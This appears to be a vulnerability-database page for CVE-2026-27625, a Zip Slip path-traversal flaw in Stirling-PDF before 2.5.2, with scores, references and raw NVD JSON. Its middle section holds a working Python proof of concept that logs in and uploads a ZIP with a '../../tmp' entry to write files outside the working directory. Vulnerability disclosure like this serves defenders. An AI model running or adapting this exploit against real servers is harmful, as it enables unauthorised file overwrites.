CVE-2026-27625

Description

Stirling-PDF is a locally hosted web application that performs various operations on PDF files. In versions prior to 2.5.2, the /api/v1/convert/markdown/pdf endpoint extracts user-supplied ZIP entries without path checks. Any authenticated user can write files outside the intended temporary working directory, leading to arbitrary file write with the privileges of the Stirling-PDF process user (stirlingpdfuser). This can overwrite writable files and compromise data integrity, with further impact depending on writable paths. The issue was fixed in version 2.5.2.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:stirling:stirling_pdf:*:*:*:*:*:*:*:* - VULNERABLE

Stirling-PDF < 2.5.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import zipfile
import io

# Target configuration
target_url = "http://localhost:8080/api/v1/convert/markdown/pdf"
login_url = "http://localhost:8080/api/v1/auth/login"
username = "attacker"
password = "password"

# Create a requests session
session = requests.Session()

# Step 1: Authenticate to get a valid session
login_payload = {
    "username": username,
    "password": password
}
login_response = session.post(login_url, json=login_payload)

if login_response.status_code != 200:
    print("Login failed")
    exit()

# Step 2: Create a malicious ZIP file using Zip Slip technique
# This attempts to write a file outside the extraction directory
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf:
    # The path "../../tmp/pwned.txt" tries to escape the temp folder
    zf.writestr("../../tmp/pwned.txt", "This is an arbitrary file write via CVE-2026-27625")

zip_buffer.seek(0)

# Step 3: Send the exploit payload
files = {
    'file': ('exploit.zip', zip_buffer, 'application/zip')
}

response = session.post(target_url, files=files)

print(f"Exploit sent. Status Code: {response.status_code}")
print(f"Response: {response.text}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27625
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27625
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27625/
[4] VulDB https://vuldb.com/cve/CVE-2026-27625
[5] https://github.com/Stirling-Tools/Stirling-PDF/releases/tag/v2.5.2
[6] https://github.com/Stirling-Tools/Stirling-PDF/security/advisories/GHSA-wccq-mg6x-2w22

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27625", "sourceIdentifier": "[email protected]", "published": "2026-03-20T09:16:13.857", "lastModified": "2026-03-24T16:03:23.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stirling-PDF is a locally hosted web application that performs various operations on PDF files. In versions prior to 2.5.2, the /api/v1/convert/markdown/pdf endpoint extracts user-supplied ZIP entries without path checks. Any authenticated user can write files outside the intended temporary working directory, leading to arbitrary file write with the privileges of the Stirling-PDF process user (stirlingpdfuser). This can overwrite writable files and compromise data integrity, with further impact depending on writable paths. The issue was fixed in version 2.5.2."}, {"lang": "es", "value": "Stirling-PDF es una aplicación web alojada localmente que realiza diversas operaciones en archivos PDF. En versiones anteriores a la 2.5.2, el endpoint /API/v1/convert/markdown/pdf extrae entradas ZIP proporcionadas por el usuario sin comprobaciones de ruta. Cualquier usuario autenticado puede escribir archivos fuera del directorio de trabajo temporal previsto, lo que lleva a la escritura arbitraria de archivos con los privilegios del usuario del proceso de Stirling-PDF (stirlingpdfuser). Esto puede sobrescribir archivos escribibles y comprometer la integridad de los datos, con un impacto adicional dependiendo de las rutas escribibles. El problema se solucionó en la versión 2.5.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:stirling:stirling_pdf:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.5.2", "matchCriteriaId": "EE82913D-A442-4C18-847F-741630FC4CD0"}]}]}], "references": [{"url": "https://github.com/Stirling-Tools/Stirling-PDF/releases/tag/v2.5.2", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://github.com/Stirling-Tools/Stirling-PDF/security/advisories/GHSA-wccq-mg6x-2w22", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}